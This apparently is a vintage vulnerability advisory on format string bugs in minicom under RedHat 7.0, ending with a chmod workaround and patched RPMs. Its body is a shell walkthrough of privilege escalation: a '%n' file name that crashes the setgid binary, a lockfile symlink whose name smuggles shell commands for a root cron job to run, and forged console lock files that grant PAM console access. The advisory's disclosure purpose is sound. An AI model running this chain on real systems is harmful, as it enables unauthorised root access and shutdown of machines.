COMMAND
minicom
SYSTEMS AFFECTED
RedHat 7.0
PROBLEM
Zenith Parsec found following. Minicom has multiple format string
bugs:
- ulog()
- werror()
Any user who has access to a correctly configured, setgid uucp
minicom can potentially gain root access within 24 hrs, or have
console access (as determined by PAM) and be able to cause
shutdown of the machine immediately.
This affects Redhat 7.0, almost definately earlier based on dates
in sourcecode comments. This may not be a security hole on other
distributions. Depends on if its setuid/setgid. Root exploit
does exist.
If minicom -s hasn't been run as root prior, then this exploit
will probably not work.
[root@clarity src]# whatis minicom
minicom (1) - friendly serial communication program
[root@clarity /root]# rpm -qf `which minicom`
minicom-1.83.1-4
[root@clarity src]# ll `which minicom`
-rwxr-sr-x 1 root uucp 171452 Jan 30 05:54 /usr/bin/minicom*
[root@clarity src]# cd /usr/src/redhat/SOURCES/minicom-1.83.1/src
[root@clarity src]# grep do_log common.c|grep -v "%"
common.c: * void do_log(char *) - write a line to the logfile
common.c: * 27.10.98 jl converted do_log to use stdarg
common.c:void do_log(char *line, ...)
common.c:void do_log(char *line, ...)
[root@clarity src]# grep do_log updown.c
do_log(cmdline); /* jl 22.06.97 */
do_log (trimbuf);
do_log(trimbuf);
do_log (trimbuf);
should be:
do_log("%s",cmdline); /* jl 22.06.97 */
do_log ("%s",trimbuf);
do_log("%s",trimbuf);
do_log ("%s",trimbuf);
and others are spread through the code that ZP hasn't checked,
but should probably be fixed.
updown.c contains the code for the uploading and downloading of
files. cmdline contains the command that it executes to upload
and download files. Part of the command is of course the filename.
[root@clarity src]# touch ~/%n
[root@clarity src]# ll ~/%n
-rw-r--r-- 1 root root 0 Apr 11 11:26 /root/%n
Using root to demonstrate problem so we can gdb the sgid program.
[root@clarity src]# gdb minicom
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) r
Starting program: /usr/bin/minicom
minicom: WARNING: please don't run minicom as root when not maintaining
it (with the -s switch) since all changes to the
configuration will be GLOBAL !.
Screen clears... initializing modem message...
Welcome to minicom 1.83.1
OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
Compiled on Aug 24 2000, 10:09:47.
Press CTRL-A Z for help on special keys
press ^A S ,select xmodem, then move the cursor down to %n, press
space to tag it and then press return...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x400b7a17 in _IO_vfprintf (s=0x8080a60,
format=0xbffff2c0 "/usr/bin/sx -vv %n", ap=0xbffff248)
at ../sysdeps/i386/i486/bits/string.h:539
539 ../sysdeps/i386/i486/bits/string.h: No such file or directory.
(gdb) q
Ok, big deal. You get gid uucp if you exploit it.
[root@clarity src]# cd /var/lock
[root@clarity lock]# ls -Flatrck
total 20
drwxr-xr-x 19 root root 4096 Apr 5 02:35 ../
drwxrwxr-x 2 root root 4096 Apr 7 12:10 subsys/
drwxr-xr-x 2 root root 4096 Apr 9 13:16 console/
drwxrwxr-x 4 root uucp 4096 Apr 11 11:31 ./
writable by gid uucp.. ok
[root@clarity lock]# cat /etc/cron.daily/makewhatis.cron
#!/bin/bash
LOCKFILE=/var/lock/makewhatis.lock
# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes. The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "rm -f $LOCKFILE" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0
The worst that can happen is someone will exploit this lockfile
mechanism for root.
[root@clarity lock]# su uucp
or run an exploit against minicom.. the gid is the important part.
sh-2.04$ id
uid=10(uucp) gid=14(uucp) groups=14(uucp)
sh-2.04$ ln -s "/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz" /var/lock/makewhatis.lock
sh-2.04$ ls -al
total 16
drwxrwxr-x 4 root uucp 4096 Apr 11 11:41 .
drwxr-xr-x 19 root root 4096 Apr 5 02:35 ..
drwxr-xr-x 2 root root 4096 Apr 9 13:16 console
lrwxrwxrwx 1 uucp uucp 91 Apr 11 11:41 makewhatis.lock -> /usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz
drwxrwxr-x 2 root root 4096 Apr 7 12:10 subsys
ok... what is happening? checkout /usr/sbin/makewhatis.
pipe_cmd = "zcat " filename;
if the filename contains shell commands, they will be exectuted.
not normally a problem, as what manpages have embedded shell
commands? Malicious ones, like this. The echo on the end is to
prevent it from returning an error from the command. The export
PATH=. is because we can't put any / characters in the filename.
Well that will get you root next time
/etc/cron.daily/makewhatos.cron runs. what else ...
sh-2.04$ rm makewhatis.lock
sh-2.04$ echo -n uucp>console.lock
sh-2.04$ mv console oldconsole
sh-2.04$ mkdir console;touch console/uucp
Now we are at the console(according to PAM anyway). Halt anyone?
SOLUTION
Work around: chmod -s /usr/bin/minicom
For Immunix OS:
http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/minicom-1.83.1-1.0.6x_StackGuard.i386.rpm
http://download.immunix.org/ImmunixOS/6.2/updates/SRPMS/minicom-1.83.1-1.0.6x_StackGuard.src.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/minicom-1.83.1-8_imnx.i386.rpm
http://download.immunix.org/ImmunixOS/7.0/updates/SRPMS/minicom-1.83.1-8_imnx.src.rpm